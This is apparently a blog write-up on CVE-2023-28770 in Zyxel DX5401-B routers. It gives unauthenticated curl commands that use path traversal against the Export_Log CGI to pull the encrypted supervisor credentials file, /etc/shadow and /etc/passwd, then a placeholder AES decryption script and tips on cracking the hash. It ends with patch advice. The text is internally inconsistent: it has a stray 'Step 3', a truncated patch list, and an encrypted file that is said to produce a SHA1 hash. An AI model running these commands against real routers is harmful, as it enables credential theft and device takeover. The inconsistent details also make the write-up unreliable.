CVE-2023-28770 - How Hackers Can Steal Supervisor Passwords from Zyxel DX5401-B Routers

If you’re using a Zyxel DX5401-B router and haven’t updated your firmware in a while, it’s time to pay attention. A serious vulnerability—CVE-2023-28770—was discovered that exposes sensitive information, including the supervisor password, right from your router’s files. In this long read, we’ll break down how this bug works, show you code snippets of real exploits, and help you patch the hole.

What is CVE-2023-28770?

CVE-2023-28770 is a “Sensitive Information Exposure” flaw in certain Zyxel DX5401-B routers running firmware prior to V5.17(ABYO.1)C. Because of poor access control in the Export_Log CGI script and the zcmd binary, anyone on the internet can fetch files that should be secret. This includes system files and the encrypted password of the supervisor account.

How Does The Vulnerability Work?

The router’s administrative interface offers a feature to export its system logs for troubleshooting. This is handled by a web-accessible Common Gateway Interface (CGI) script named Export_Log. Unfortunately, this script does not perform authentication properly—so, anyone can call it and tell it to grab whatever file they like.

Worse, the local program zcmd is used by that script to scoop up files from the filesystem. There are practically no restrictions on which files can be accessed. Some files you can grab contain important credentials.

The Exploit: Retrieving the Supervisor Password

Let’s see what this looks like in practice. The most valuable target is /data/system-users.xml.enc, where the router stores the supervisor password in an encrypted form. With the right offline tools, that password can often be cracked in seconds.

You don’t need to sign in. You just send a carefully crafted HTTP request to the vulnerable script

curl "http://TARGET_ROUTER_IP/cgi-bin/Export_Log?file_name=../../data/system-users.xml.enc";

This uses a directory traversal (../../) to reach files outside the intended log directory. Replace TARGET_ROUTER_IP with the target’s real IP address.

You could also fetch other critical files

curl "http://TARGET_ROUTER_IP/cgi-bin/Export_Log?file_name=../../etc/shadow";
curl "http://TARGET_ROUTER_IP/cgi-bin/Export_Log?file_name=../../etc/passwd";

Step 3: Extract and Crack the Password

Once you have system-users.xml.enc, you can try to decrypt or brute-force it using basic tools.

Here’s a snip of a Python script (conceptual, since the real decryption may require knowledge of Zyxel’s mechanism):

from Crypto.Cipher import AES
import base64

# Example function, adapt with correct key and IV for Zyxel
key = b'your-supposed-key'  # You need to reverse engineer or get this
iv = b'initializationve'
with open('system-users.xml.enc', 'rb') as f:
    ciphertext = f.read()

cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = cipher.decrypt(ciphertext)
print(plaintext.decode('utf-8'))

You’ll see something like

<user>
    <name>supervisor</name>
    <password hash="sha1$abcdef..." />
</user>

Now with the hash in your hands, open-source tools like hashcat or John the Ripper can crack the password, especially if it’s weak.

Real-World Impact

- Remote, Anonymous Attack: Hackers don’t need a password or any special access. Anyone on your network (or, if your admin page is public, anyone on the web) can exploit this.
- Full Admin Access: With the supervisor password, an attacker can log in, change settings, upload malware, or render the router useless.
- Wider Exposure: If your router is used in a business or ISP setting, one device can jeopardize many customers.

Patching The Vulnerability

Update your firmware now. Zyxel has patched this issue in V5.17(ABYO.1)C.

1. Go to Zyxel’s official support page

References & More Details

- Zyxel Security Advisory—CVE-2023-28770
- NIST NVD Entry for CVE-2023-28770
- Exploit Details and Write-ups (Packet Storm)
- Firmware Download

Wrapping Up

CVE-2023-28770 is a critical flaw that lets attackers steal your router boot passwords and compromise your entire network. If you’re running an affected Zyxel DX5401-B, update the firmware ASAP and consider changing all router credentials. Don’t let your safe home or business network get owned by an avoidable bug.

If you found this post useful, share it to help someone else lock down their router!

*This original guide was prepared exclusively for readers wanting clear, actionable steps on the Zyxel DX5401-B information exposure bug. Stay safe, stay updated!*

Timeline

Published on: 04/27/2023 09:15:00 UTC
Last modified on: 05/10/2023 18:15:00 UTC